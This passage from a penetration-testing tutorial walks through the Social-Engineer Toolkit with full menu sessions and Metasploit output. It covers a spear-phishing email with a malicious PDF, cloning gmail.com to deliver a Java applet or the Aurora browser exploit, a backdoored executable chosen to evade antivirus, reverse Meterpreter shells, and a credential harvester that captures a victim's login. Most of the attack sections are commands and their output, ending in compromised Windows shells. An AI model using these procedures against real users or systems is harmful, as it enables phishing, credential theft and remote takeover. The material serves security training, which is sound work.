the ability to fully customize them based on your target. Let's dive into the menu and do a brief
walkthrough of each attack vector.
root@bt:/pentest/exploits/set# ./set
[---] The Social-Engineer Toolkit (SET) [---]
[---] Written by David Kennedy (ReL1K) [---]
[---] Version: 0.7 [---]
[---] Codename: 'Swagger Wagon' [---]
[---] Report bugs to: davek@social-engineer.org [---]
[---] Java Applet Written by: Thomas Werth [---]
[---] Homepage: http://www.secmaniac.com [---]
[---] Framework: http://www.social-engineer.org [---]
[---] Over 1 million downloads and counting. [---]

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

Follow me on Twitter: dave_rel1k

DerbyCon 2011 Sep29-Oct02 - A new era begins...
irc.freenode.net - #DerbyCon - http://www.derbycon.com
Select from the menu:
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. Update the Metasploit Framework
8. Update the Social-Engineer Toolkit
9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit

Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows
you to specially craft email messages and send them to a large
(or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure
"Sendmail" is installed (it is installed in BT4) and change
the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting
SET do everything for you (option 1), the second is to create
your own FileFormat payload and use it in your own attack. Either
way, good luck and enjoy!
1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice:

The spear-phishing attack menu is used for performing targeted email attacks against a
victim. You can send multiple emails based on what you harvested, or you can send them to
individuals. You can also utilize a file-format exploit (for example a PDF bug) and send the
malicious attachment to the victim in order to hopefully compromise the system.
Select from the menu:
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. Update the Metasploit Framework
8. Update the Social-Engineer Toolkit
9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit
Enter your choice: 2
The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing
multiple web-based attacks in order to compromise the intended victim.
Enter what type of attack you would like to utilize.
The Java Applet attack will spoof a Java Certificate and deliver a Metasploit
based payload. Uses a customized java applet created by Thomas Werth to
deliver the payload.
The Metasploit browser exploit method will utilize select Metasploit browser
exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester Method will utilize web cloning of a website that has
a username and password field and harvest all the information posted to the
website.
The TabNabbing Method will wait for a user to move to a different tab, then
refresh the page to something different.
The Man Left in the Middle Attack Method was introduced by Kos and utilizes
HTTP REFERER's in order to intercept fields and harvest data from them. You
need to have an already vulnerable site and incorporate <script
src="http://YOURIP/">. This could either be from a compromised site or through
XSS.
The web jacking attack method was introduced by white_sheep, Emgent and the
Back|Track team. This method utilizes iframe replacements to make the
highlighted URL link to appear legitimate however when clicked a window pops
up then is replaced with the malicious link. You can edit the link replacement
settings in the set_config if its to slow/fast.
The multi-attack will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at
once to see which is successful.

1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu

Enter your choice (press enter for default):

The web attack vector is used by performing phishing attacks against the victim in the hope
they click the link. There is a wide variety of attacks that can occur once they click. We will
dive into each one of the attacks later on.
3. Infectious Media Generator

The infectious USB/DVD creator will develop a Metasploit-based payload for you and craft
an autorun.inf file that, once burned or placed on a USB, will trigger the autorun feature and
hopefully compromise the system. This attack vector is relatively simple in nature and relies
on deploying the devices to the physical system.
4. Create a Payload and Listener

The create payload and listener is an extremely simple wrapper around Metasploit to create
a payload, export the exe for you and generate a listener. You would need to transfer the
exe onto the victim machine and execute it in order for it to properly work.
5. Mass Mailer Attack

The mass mailer attack will allow you to send multiple emails to victims and customize the
messages. This option does not allow you to create payloads, so it is generally used to
perform a mass phishing attack.
Select from the menu:
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. Update the Metasploit Framework
8. Update the Social-Engineer Toolkit
9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit

Enter your choice: 6

Welcome to the Teensy HID Attack Vector.
Special thanks to: IronGeek and WinFang
The Teensy HID Attack Vector utilizes the teensy USB device to
program the device to act as a keyboard. Teensy's have onboard
storage and can allow for remote code execution on the physical
system. Since the devices are registered as USB Keyboard's it
will bypass any autorun disabled or endpoint protection on the
system.
You will need to purchase the Teensy USB device, it's roughly
$22 dollars. This attack vector will auto generate the code
needed in order to deploy the payload on the system for you.
This attack vector will create the .pde files necessary to import
into Arduino (the IDE used for programming the Teensy). The attack
vectors range from Powershell based downloaders, wscript attacks,
and other methods.
For more information on specifications and good tutorials visit:
http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystrokedongle
To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html
Select a payload to create the pde file to import into Arduino:
1. Powershell HTTP GET MSF Payload
2. WSCRIPT HTTP GET MSF Payload
3. Powershell based Reverse Shell
4. Return to the main menu.

Enter your choice:

The Teensy USB HID attack is a method that uses a hardware device purchased from
pjrc.com, programmed in a manner that makes the small USB microcontroller look
and feel exactly like a keyboard. The important part of this is that it bypasses autorun
restrictions and can drop payloads onto the system through the onboard flash memory. The
keyboard simulation allows you to type characters in a manner that can utilize downloaders
and exploit the system.
7. Update the Metasploit Framework
8. Update the Social-Engineer Toolkit
9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit

The following menus will perform updates on Metasploit, the Social-Engineer Toolkit,
provide help and credits, and lastly exit the Social-Engineer Toolkit (why would you ever
want to do that?!).

Attack Vectors
Spear-Phishing Attack Vector
As mentioned previously, the spear-phishing attack vector can be used to send targeted
emails with malicious attachments. In this example we are going to craft an attack, integrate
it with GMAIL and send a malicious PDF to the victim. One thing to note is that you can create and
save your own templates to use for future SE attacks, or you can use pre-built ones. Also note
that when hitting enter for the defaults in SET, the reverse connection will always be on port
443 and the payload a reverse Meterpreter.
Select from the menu:
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. Update the Metasploit Framework
8. Update the Social-Engineer Toolkit
9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit

Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!
1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice: 1


Select the file format exploit you want.
The default is the PDF embedded EXE.
********** PAYLOADS **********
1. Adobe CoolType SING Table 'uniqueName' Overflow (0day)
2. Adobe Flash Player 'newfunction' Invalid Pointer Use
3. Adobe Collab.collectEmailInfo Buffer Overflow
4. Adobe Collab.getIcon Buffer Overflow
5. Adobe JBIG2Decode Memory Corruption Exploit
6. Adobe PDF Embedded EXE Social Engineering
7. Adobe util.printf() Buffer Overflow
8. Custom EXE to VBA (sent via RAR) (RAR required)
9. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun

Enter the number you want (press enter for default): 1

1. Windows Reverse TCP Shell
2. Windows Meterpreter Reverse_TCP
3. Windows Reverse VNC
4. Windows Reverse TCP Shell (x64)
5. Windows Meterpreter Reverse_TCP (X64)
6. Windows Shell Bind_TCP (X64)

Enter the payload you want (press enter for default):
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 172.16.32.129:443
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.

As an added bonus, use the file-format creator in SET to create your
attachment.
Right now the attachment will be imported with filename of 'template.whatever'
Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.
Enter your choice (enter for default): 1
Keeping the filename and moving on.
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.
What do you want to do:
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.
Enter your choice: 1

Do you want to use a predefined template or craft a one time email template.
1. Pre-Defined Template
2. One-Time Use Email Template
Enter your choice: 1
Below is a list of available templates:
1: Baby Pics
2: Strange Internet usage from your computer
3: New Update
4: LOL...have to check this out...
5: Dan Brown's Angels & Demons
6: Computer Issue
7: Status Report
Enter the number you want to use: 7


Enter who you want to send email to: kennedyd013@gmail.com
What option do you want to use?
1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay
Enter your choice: 1
Enter your GMAIL email address: kennedyd013@gmail.com
Enter your password for gmail (it will not be displayed back to you):

SET has finished delivering the emails.


Do you want to setup a listener yes or no: yes
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***
[Metasploit ASCII-art banner]

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
=[ svn r10268 updated today (2010.09.09)


resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD
windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.32.129:443
[*] Starting the payload handler...
msf exploit(handler) >

Once the attack is set up, the victim opens the email and then opens the PDF attachment:

As soon as the victim opens the attachment up, a shell is presented back to us:
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1139) at
Thu Sep 09 09:58:06 -0400 2010

msf exploit(handler) > sessions -i 1


[*] Starting interaction with 1...
meterpreter > shell
Process 3940 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>

The spear-phishing attack can be sent to a single person or to many, it integrates with
Gmail, and it can be completely customized to the needs of your attack vector. Overall this
is a very effective vector for email spear-phishing.

Java Applet Attack Vector


The Java Applet is one of the core attack vectors within SET and has the highest success
rate for compromise. The Java Applet attack creates a malicious Java Applet that, once run,
completely compromises the victim. The neat trick with SET is that you can completely
clone a website, and once the victim has clicked Run it redirects the victim back to the
original site, making the attack much more believable. This attack vector affects Windows,
Linux, and OSX and can compromise them all. Remember that if you want to customize this
attack vector, edit config/set_config to change the self-signed certificate information. In
this specific attack vector you can select web templates, which are pre-defined websites
that have already been harvested, or you can import your own website. In this example we
will be using the site cloner, which clones a website for us. Let's launch SET and prep our
attack.
Select from the menu:
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. Update the Metasploit Framework
8. Update the Social-Engineer Toolkit
9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit

Enter your choice: 2


The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing
multiple web-based attacks in order to compromise the intended victim.
Enter what type of attack you would like to utilize.
The Java Applet attack will spoof a Java Certificate and deliver a metasploit
based payload. Uses a customized java applet created by Thomas Werth to
deliver the payload.
The Metasploit browser exploit method will utilize select Metasploit browser
exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester Method will utilize web cloning
of a website that has a username and password field and
harvest all the information posted to the website.
The TabNabbing Method will wait for a user to move to a
different tab, then refresh the page to something different.
The Man Left in the Middle Attack Method was introduced by
Kos and utilizes HTTP REFERER's in order to intercept fields
and harvest data from them. You need to have an already vulnerable
site and incorporate <script src="http://YOURIP/">. This could either
be from a compromised site or through XSS.
The web jacking attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its to slow/fast.
The multi-attack will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu


Enter your choice (press enter for default): 1

The first method will allow SET to import a list of pre-defined
web applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
[!] Website Attack Vectors [!]
1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu

Enter number (1-4): 2


SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: tgbYm1k69
[*] Malicious java applet website prepped for deployment

What payload do you want to generate:


Name:                                   Description:

1. Windows Shell Reverse_TCP            Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter      Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL          Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                   Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64               Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64        Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64  Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster    Spawn a meterpreter shell and find a port home via multiple ports
9. Import your own executable           Specify a path for your own executable

Enter choice (hit enter for default): 2


Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.
1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)
Enter your choice (enter for default): 16
[-] Enter the PORT of the listener (enter for default): 443
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.
********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************
Enter choice yes or no: yes

Enter the port to listen for on OSX: 8080
Enter the port to listen for on Linux: 8081
Created by msfpayload (http://www.metasploit.com).
Payload: osx/x86/shell_reverse_tcp
Length: 65
Options: LHOST=172.16.32.129,LPORT=8080
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
Length: 50
Options: LHOST=172.16.32.129,LPORT=8081
***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************
[--] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [--]
[*] Launching MSF Listener...
[*] This may take a few to load MSF...
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
=[ svn r10268 updated today (2010.09.09)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false

resource (src/program_junk/meta_config)> exploit -j


[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 8080
LPORT => 8080
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
[*] Started reverse handler on 0.0.0.0:443
resource (src/program_junk/meta_config)> exploit -j
[*] Starting the payload handler...
[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 8081
LPORT => 8081
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> set AutoRunScript migrate -f
[*] Started reverse handler on 172.16.32.129:8080
AutoRunScript => migrate -f
resource (src/program_junk/meta_config)> exploit -j
[*] Starting the payload handler...
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.32.129:8081
[*] Starting the payload handler...

In this attack we've set up our scenario to clone https://gmail.com and use the reverse
meterpreter attack vector on port 443. We've used the backdoored executable to hopefully
bypass anti-virus and set up Metasploit to handle the reverse connections. If you wanted to
use an email with this attack vector, you could change WEBATTACK_EMAIL=OFF to
WEBATTACK_EMAIL=ON in config/set_config. When you get a victim to click a link or coax
him to your website, it will look something like this:

As soon as the victim clicks run, you are presented with a meterpreter shell, and the victim
is redirected back to the original Google site completely unaware that they have been
compromised.
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1183) at
Thu Sep 09 10:06:57 -0400 2010
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2988 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>

Metasploit Browser Exploit Method


The Metasploit Browser Exploit Method imports Metasploit client-side exploits and combines
them with the ability to clone a website, so the cloned page delivers a browser-based
exploit. Let's take a quick look at running a browser exploit through SET.
Select from the menu:
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. Update the Metasploit Framework
8. Update the Social-Engineer Toolkit
9. Help, Credits, and About
10. Exit the Social-Engineer Toolkit

Enter your choice: 2


The Social-Engineer Toolkit "Web Attack" vector is a unique way of
utilizing multiple web-based attacks in order to compromise the
intended victim.
Enter what type of attack you would like to utilize.
The Java Applet attack will spoof a Java Certificate and
deliver a metasploit based payload. Uses a customized
java applet created by Thomas Werth to deliver
the payload.
The Metasploit browser exploit method will utilize select
Metasploit browser exploits through an iframe and deliver
a Metasploit payload.
The Credential Harvester Method will utilize web cloning
of a website that has a username and password field and
harvest all the information posted to the website.
The TabNabbing Method will wait for a user to move to a
different tab, then refresh the page to something different.
The Man Left in the Middle Attack Method was introduced by
Kos and utilizes HTTP REFERER's in order to intercept fields
and harvest data from them. You need to have an already vulnerable
site and incorporate <script src="http://YOURIP/">. This could either
be from a compromised site or through XSS.
The web jacking attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its to slow/fast.
The multi-attack will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu

Enter your choice (press enter for default): 2

The first method will allow SET to import a list of pre-defined
web applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
[!] Website Attack Vectors [!]
1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu

Enter number (1-4): 2


SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com
Enter the browser exploit you would like to use
1. Microsoft Windows WebDAV Application DLL Hijacker
2. Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution
3. Microsoft Windows Shell LNK Code Execution (MS10-046)
4. Microsoft Help Center XSS and Command Execution (MS10-042)
5. Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
6. Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
7. Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
8. Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
9. Internet Explorer Style getElementsbyTagName Corruption (MS09-072)
10. Internet Explorer isComponentInstalled Overflow
11. Internet Explorer Explorer Data Binding Corruption (MS08-078)
12. Internet Explorer Unsafe Scripting Misconfiguration
13. FireFox 3.5 escape Return Value Memory Corruption
Enter your choice (1-12) (enter for default): 7
What payload do you want to generate:
Name:                                   Description:

1. Windows Shell Reverse_TCP            Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter      Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL          Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                   Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64               Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64        Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64  Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster    Spawn a meterpreter shell and find a port home via multiple ports
9. Download/Run your Own Executable     Downloads an executable and runs it

Enter choice (example 1-8) (Enter for default):
Enter the port to use for the reverse (enter for default):
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************
[--] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [--]
[*] Launching MSF Listener...
[*] This may take a few to load MSF...
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
=[ svn r10268 updated today (2010.09.09)

resource (src/program_junk/meta_config)> use windows/browser/ms10_002_aurora
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set URIPATH /
URIPATH => /
resource (src/program_junk/meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started reverse handler on 172.16.32.129:443
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://172.16.32.129:8080/
[*] Server started.

Once the victim browses the website, it will look exactly like the site you cloned and then
compromise the system.
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1183) at
Thu Sep 09 10:14:22 -0400 2010
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2988 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>

Credential Harvester Attack Method


The credential harvester attack method is used when you don't specifically want a shell but
want to perform phishing attacks in order to obtain usernames and passwords. In this attack
vector a website is cloned, and when the victim enters their user credentials, the usernames
and passwords are posted back to your machine and the victim is then redirected back to
the legitimate site.
1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu

Enter your choice (press enter for default): 3

The first method will allow SET to import a list of pre-defined
web applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
[!] Website Attack Vectors [!]
1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu

Enter number (1-4): 2


Email harvester will allow you to utilize the clone capabilities within SET
to harvest credentials or parameters from a website as well as place them into
a report.

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]
Press {return} to continue.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

Once the victim clicks the link, they will be presented with an exact replica of gmail.com and
hopefully be enticed to enter their username and password into the form fields.

As soon as the victim hits sign in, we are presented with the credentials and the victim is
redirected back to the legitimate site.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
172.16.32.131 - - [09/Sep/2010 10:12:55] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-7536764660264620804
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=nwAWNiTEqGc
POSSIBLE USERNAME FIELD FOUND: Email=thisismyuser
POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=
[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT

Also note that when you're finished you hit CONTROL-C, and a report is generated for you in
two formats. The first is an HTML-based report; the other is XML, if you need to parse the
information into another tool.
^C[*] File exported to reports/2010-09-09 10:14:30.152435.html for your
reading pleasure...
[*] File in XML format exported to reports/2010-09-09 10:14:30.152435.xml for
your reading pleasure...
Press {return} to return to the menu.^C
The Social-Engineer Toolkit "Web Attack" vector is a unique way of
utilizing multiple web-based attacks in order to compromise the
intended victim.
Enter what type of attack you would like to utilize.
The Java Applet attack will spoof a Java Certificate and
deliver a metasploit based payload. Uses a customized
java applet created by Thomas Werth to deliver
the payload.
The Metasploit browser exploit method will utilize select
Metasploit browser exploits through an iframe and deliver
a Metasploit payload.
The Credential Harvester Method will utilize web cloning
of a website that has a username and password field and
harvest all the information posted to the website.
The TabNabbing Method will wait for a user to move to a
different tab, then refresh the page to something different.
The Man Left in the Middle Attack Method was introduced by
Kos and utilizes HTTP REFERER's in order to intercept fields
and harvest data from them. You need to have an already vulnerable
site and incorporate <script src="http://YOURIP/">. This could either
be from a compromised site or through XSS.
The web jacking attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its to slow/fast.
The multi-attack will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu

Enter your choice (press enter for default): ^C


Thank you for shopping at the Social-Engineer Toolkit.
Hack the Gibson...
root@bt:/pentest/exploits/set# firefox reports/2010-09-09\ 10\:14\:30.152435.
2010-09-09 10:14:30.152435.html 2010-09-09 10:14:30.152435.xml
